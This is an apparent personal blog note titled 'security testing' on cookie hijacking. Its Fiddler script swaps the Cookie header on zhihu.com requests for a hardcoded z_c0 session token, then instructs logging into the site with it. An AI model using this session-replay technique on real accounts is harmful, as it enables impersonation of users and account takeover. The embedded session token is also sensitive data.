20161120-安全测试

cookie劫持

 

  if(oSession.uriContains("zhihu.com"))
        {
            var sCookie ="z_c0=Mi4wQUFDQWhvY1pBQUFBSUVEbFRpTEhDUmNBQUFCaEFsVk5fWlpZV0FCV280S3ZvaHdhTUV6Zm9hcVpHaXBtNHlLb0pB|1479608845|09ed070f777cff690f6c28ab0b4ff8c36b22c8d3;";
            oSession.oRequest["Cookie"] = sCookie;
        }

输入cookie

登录网站

posted @ 2016-11-20 10:54  swllow  阅读(172)  评论(0编辑  收藏  举报